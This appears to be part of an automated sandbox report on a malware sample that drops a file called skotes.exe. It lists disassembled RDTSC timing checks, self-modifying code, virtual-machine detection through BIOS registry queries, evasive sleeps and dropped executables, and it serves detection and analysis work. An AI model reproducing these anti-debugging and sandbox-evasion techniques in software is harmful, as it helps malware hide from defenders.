Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 551020D second address: 5510220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 movzx esi, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 5510220 second address: 5510247 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA52075DA62h 0x0000000a sbb al, 00000028h 0x0000000d jmp 00007FA52075DA5Bh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 5510247 second address: 551026B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 21h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ror eax, cl 0x0000000a jmp 00007FA52101323Dh 0x0000000f leave 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov si, dx 0x00000016 mov ebx, 37804D2Ah 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 551026B second address: 55102F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f mov esi, eax 0x00000011 lea eax, dword ptr [ebp-08h] 0x00000014 xor esi, dword ptr [00D52014h] 0x0000001a push eax 0x0000001b push eax 0x0000001c push eax 0x0000001d lea eax, dword ptr [ebp-10h] 0x00000020 push eax 0x00000021 call 00007FA524F5DC0Fh 0x00000026 push FFFFFFFEh 0x00000028 jmp 00007FA52075DA64h 0x0000002d pop eax 0x0000002e jmp 00007FA52075DA60h 0x00000033 ret 0x00000034 nop 0x00000035 push eax 0x00000036 call 00007FA524F5DC30h 0x0000003b mov edi, edi 0x0000003d pushad 0x0000003e mov bx, ax 0x00000041 mov bx, si 0x00000044 popad 0x00000045 xchg eax, ebp 0x00000046 pushad 0x00000047 mov dh, ah 0x00000049 call 00007FA52075DA67h 0x0000004e movzx ecx, di 0x00000051 pop edi 0x00000052 popad 0x00000053 push eax 0x00000054 jmp 00007FA52075DA5Bh 0x00000059 xchg eax, ebp 0x0000005a jmp 00007FA52075DA66h 0x0000005f mov ebp, esp 0x00000061 pushad 0x00000062 mov dl, ch 0x00000064 push eax 0x00000065 push edx 0x00000066 movsx edx, si 0x00000069 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C0022 second address: 54C0028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C0028 second address: 54C00A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FA52075DA5Ch 0x00000008 pop esi 0x00000009 movsx edx, cx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov ebx, 0669089Ch 0x00000017 mov si, bx 0x0000001a popad 0x0000001b push edi 0x0000001c mov ax, D7A3h 0x00000020 pop eax 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 call 00007FA52075DA65h 0x00000029 pushfd 0x0000002a jmp 00007FA52075DA60h 0x0000002f and esi, 52D1E818h 0x00000035 jmp 00007FA52075DA5Bh 0x0000003a popfd 0x0000003b pop ecx 0x0000003c mov bx, B15Ch 0x00000040 popad 0x00000041 mov ebp, esp 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FA52075DA5Dh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C00A4 second address: 54C00B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C00B9 second address: 54C00C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA52075DA5Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C00C9 second address: 54C00CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C00CD second address: 54C012C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b pushad 0x0000000c push edx 0x0000000d jmp 00007FA52075DA68h 0x00000012 pop ecx 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 mov dl, ah 0x00000018 mov di, DE68h 0x0000001c popad 0x0000001d mov dword ptr [esp], ecx 0x00000020 jmp 00007FA52075DA67h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FA52075DA60h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C012C second address: 54C0130 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C0130 second address: 54C0136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C0136 second address: 54C013C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C013C second address: 54C0140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C0140 second address: 54C0170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA52101323Fh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA521013245h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C0170 second address: 54C01DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, dword ptr [ebp+10h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA52075DA65h 0x00000014 jmp 00007FA52075DA5Bh 0x00000019 popfd 0x0000001a mov ebx, eax 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f mov ecx, 7F18CFD7h 0x00000024 call 00007FA52075DA5Ch 0x00000029 call 00007FA52075DA62h 0x0000002e pop esi 0x0000002f pop ebx 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FA52075DA5Ch 0x00000039 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C01DA second address: 54C01E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C01E0 second address: 54C01E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C01E4 second address: 54C020E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov cl, dh 0x0000000c mov ch, ABh 0x0000000e popad 0x0000000f mov esi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA521013246h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C020E second address: 54C0214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C0214 second address: 54C0218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C0218 second address: 54C022A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dx, 6A26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C022A second address: 54C022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C022F second address: 54C02B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c pushad 0x0000000d jmp 00007FA52075DA5Eh 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FA52075DA60h 0x00000019 jmp 00007FA52075DA65h 0x0000001e popfd 0x0000001f call 00007FA52075DA60h 0x00000024 pop eax 0x00000025 popad 0x00000026 popad 0x00000027 test esi, esi 0x00000029 jmp 00007FA52075DA61h 0x0000002e je 00007FA59272BDCEh 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FA52075DA5Dh 0x0000003b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C02B2 second address: 54C02B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C02B8 second address: 54C02BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C02BC second address: 54C0368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f pushad 0x00000010 mov esi, ebx 0x00000012 push ebx 0x00000013 mov esi, 43422183h 0x00000018 pop eax 0x00000019 popad 0x0000001a je 00007FA592FE158Bh 0x00000020 jmp 00007FA52101323Fh 0x00000025 mov edx, dword ptr [esi+44h] 0x00000028 pushad 0x00000029 push ecx 0x0000002a call 00007FA52101323Bh 0x0000002f pop eax 0x00000030 pop ebx 0x00000031 jmp 00007FA521013246h 0x00000036 popad 0x00000037 or edx, dword ptr [ebp+0Ch] 0x0000003a jmp 00007FA521013240h 0x0000003f test edx, 61000000h 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 pushfd 0x00000049 jmp 00007FA52101323Dh 0x0000004e sbb esi, 611F1BC6h 0x00000054 jmp 00007FA521013241h 0x00000059 popfd 0x0000005a call 00007FA521013240h 0x0000005f pop ecx 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C0368 second address: 54C0383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA52075DA67h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C0383 second address: 54C03D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FA592FE151Ch 0x00000011 pushad 0x00000012 movzx esi, bx 0x00000015 mov esi, edi 0x00000017 popad 0x00000018 test byte ptr [esi+48h], 00000001h 0x0000001c jmp 00007FA52101323Bh 0x00000021 jne 00007FA592FE1519h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a call 00007FA52101323Bh 0x0000002f pop eax 0x00000030 mov edi, 426A719Ch 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C03D9 second address: 54C0426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA52075DA60h 0x00000009 sub si, 66B8h 0x0000000e jmp 00007FA52075DA5Bh 0x00000013 popfd 0x00000014 mov ax, DEEFh 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test bl, 00000007h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007FA52075DA67h 0x00000026 pop ecx 0x00000027 push edi 0x00000028 pop esi 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54C0426 second address: 54C042C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0716 second address: 54B0743 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA52075DA5Fh 0x00000008 mov ax, D7CFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA52075DA61h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0743 second address: 54B0753 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA52101323Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0753 second address: 54B076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov ecx, 1799E3BBh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B076F second address: 54B0788 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 0F33h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA52101323Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0788 second address: 54B078E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B078E second address: 54B07C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013244h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA521013247h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B07C0 second address: 54B07EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA52075DA5Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B07EF second address: 54B0825 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007FA521013247h 0x00000010 test esi, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0825 second address: 54B0829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0829 second address: 54B082F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B082F second address: 54B087C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA5927335A7h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov si, di 0x00000015 pushfd 0x00000016 jmp 00007FA52075DA69h 0x0000001b sbb ecx, 11ECC206h 0x00000021 jmp 00007FA52075DA61h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B087C second address: 54B08B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA521013248h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B08B4 second address: 54B08C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B08C3 second address: 54B08C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B08C9 second address: 54B08CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B08CD second address: 54B0924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, esi 0x0000000a jmp 00007FA521013247h 0x0000000f je 00007FA592FE8CEBh 0x00000015 jmp 00007FA521013246h 0x0000001a test byte ptr [77516968h], 00000002h 0x00000021 pushad 0x00000022 movzx esi, dx 0x00000025 mov ecx, edi 0x00000027 popad 0x00000028 jne 00007FA592FE8CD4h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0924 second address: 54B0928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0928 second address: 54B092E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B092E second address: 54B0999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA52075DA5Fh 0x00000009 xor ecx, 22DFC6BEh 0x0000000f jmp 00007FA52075DA69h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov edx, dword ptr [ebp+0Ch] 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushfd 0x0000001f jmp 00007FA52075DA69h 0x00000024 and al, FFFFFFA6h 0x00000027 jmp 00007FA52075DA61h 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0999 second address: 54B0A48 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov bx, si 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA521013244h 0x00000013 xor cx, 2C78h 0x00000018 jmp 00007FA52101323Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FA521013248h 0x00000024 sub cx, 46D8h 0x00000029 jmp 00007FA52101323Bh 0x0000002e popfd 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007FA521013249h 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov ebx, 04183E4Eh 0x0000003f pushfd 0x00000040 jmp 00007FA52101323Fh 0x00000045 sbb ah, FFFFFFFEh 0x00000048 jmp 00007FA521013249h 0x0000004d popfd 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0A48 second address: 54B0A83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 9112h 0x00000007 mov esi, ebx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d jmp 00007FA52075DA62h 0x00000012 mov dword ptr [esp], ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA52075DA67h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0A83 second address: 54B0A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0A89 second address: 54B0A8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0A8D second address: 54B0A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0A91 second address: 54B0ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+14h] 0x0000000b jmp 00007FA52075DA67h 0x00000010 push dword ptr [ebp+10h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA52075DA60h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: 54B0ACA second address: 54B0ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Special instruction interceptor: First address: D5E94A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Special instruction interceptor: First address: F064EE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Special instruction interceptor: First address: F82AFF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: BFE94A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: DA64EE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: E22AFF instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\dFVyelEPsf.exe Code function: 0_2_05530807 rdtsc 0_2_05530807
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 384 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 1917 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 2577 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1075542001\8dcfe9a593.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4428 Thread sleep count: 57 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4428 Thread sleep time: -114057s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6000 Thread sleep count: 51 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6000 Thread sleep time: -102051s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2292 Thread sleep count: 384 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2292 Thread sleep time: -11520000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4260 Thread sleep count: 58 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4260 Thread sleep time: -116058s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5800 Thread sleep time: -180000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4268 Thread sleep count: 1917 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4268 Thread sleep time: -3835917s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5816 Thread sleep count: 2577 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5816 Thread sleep time: -5156577s >= -30000s Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 3040 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\dFVyelEPsf.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
